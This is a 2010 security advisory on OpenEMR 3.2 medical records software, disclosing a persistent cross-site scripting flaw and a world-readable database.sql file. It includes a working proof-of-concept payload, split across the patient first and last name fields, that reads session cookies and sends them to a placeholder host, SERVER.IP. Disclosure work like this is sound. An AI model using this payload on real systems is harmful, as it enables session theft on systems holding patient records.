OpenEMR Electronic Medical Record Software Cross Site Scripting

`Redspin Security Notice -- RSN-2010-01  
Multiple vulnerabilities in OpenEMR Electronic Medical Record Software  
  
Overview  
----------------  
Quote from http://www.oemr.org/  
OpenEMR is a free medical practice management, electronic medical records,  
prescription writing, and medical billing application. These programs are  
also  
referred to as electronic health records. OpenEMR is licensed under the  
General  
Gnu Public License (General GPL). It is a free open source replacement for  
medical applications such as Medical Manager, Health Pro, and Misys. It  
features  
support for EDI billing to clearing houses such as Availity, MD-Online,  
MedAvant  
and ZirMED using ANSI X12.  
  
Description  
----------------  
An issue was discovered with the OpenEMR standard installation.  
  
There exists a persistent cross-site scripting (XSS) attack vector,  
in which a patient may be maliciously named in a way that will send session  
data  
to a third party web host.  
  
  
Details  
----------------  
Vulnerable Product : OpenEMR 3.2  
Vulnerability Type : Session-stealing XSS & Directory Listing  
Discovered by : David Shaw ([email protected])  
  
  
Timeline  
----------------  
Bug Discovered : May 14, 2010  
Vendor Advised : June 1, 2010  
Vendor Response : June 2, 2010  
Patch Released : June 2, 2010  
Public Disclosure : June 23, 2010  
  
Analysis  
----------------  
Due to an incorrectly sanitized input in the "patient name" field, it is  
possible to create a malformed patient name that will translate into a  
persistent cross site scripting exploit.  
  
Due to the nature of the form, "First Name" and "Last Name" are reversed in  
the  
resulting output. As such, the Javascript injection must start on "last  
name"  
and continue on to "first name."  
  
Furthermore, there is a comma in between these two outputs which must be  
taken  
into account by inserting Javascript comments between the two injections. A  
working demonstration of this persistent XSS is available in the "Proof of  
Concept" section of this notice.  
  
In addition to the cross-site scripting vulnerability, certain sensitive  
directories are open by default and world-readable. For example, the  
database.sql file may be read at http://server/openemr/sql/database.sql  
  
Proof of Concept  
----------------  
  
Bug #1: Persistent Cross-Site Scripting  
~~~~~~~~~~~~~~~~~~~~~~~  
  
Once logged into OpenEMR, navigate to Management->New/Search. The resulting  
menu will have form inputs for patient information. The malicious  
input is as follows:  
  
(First Name): */I.src='http://SERVER.IP/'+encodeURI(C);</script>  
(Last Name): <script>var C=document.cookie;var I=new Image; /*  
  
The resulting statement in the output is:  
<script>  
var C=document.cookie;  
var I=new Image;  
/*, */  
I.src='http://SERVER.IP/'+encodeURI(C);  
</script>  
  
When this patient has been inserted, it will show up as a blank name in the  
patient database. However, when any user attempts to search for a patient  
or view the list of existing patients, his session ID is sent (silently)  
to web server logs (in this case, to SERVER.IP).  
  
  
Solution  
----------------  
A patch was released on June 2, 2010 which mitigates this persistent  
cross-site  
scripting attack vector. This script is located on OpenEMR's Sourceforge  
page:  
  
http://sourceforge.net/tracker/index.php?func=detail&aid=3010645&group_id=60081&atid=493003  
  
  
Additional Notes  
----------------  
As part of its response to this problem, the OpenEMR project released an  
early  
version of this advisory on their Sourceforge developer forum. The original  
thread is located at:  
  
https://sourceforge.net/projects/openemr/forums/forum/202506/topic/3530656  
  
Out of respect for OpenEMR developers, the release of this advisory was  
postponed  
until a working patch was released out--despite having an already made the  
advisory  
public by their own choice.  
`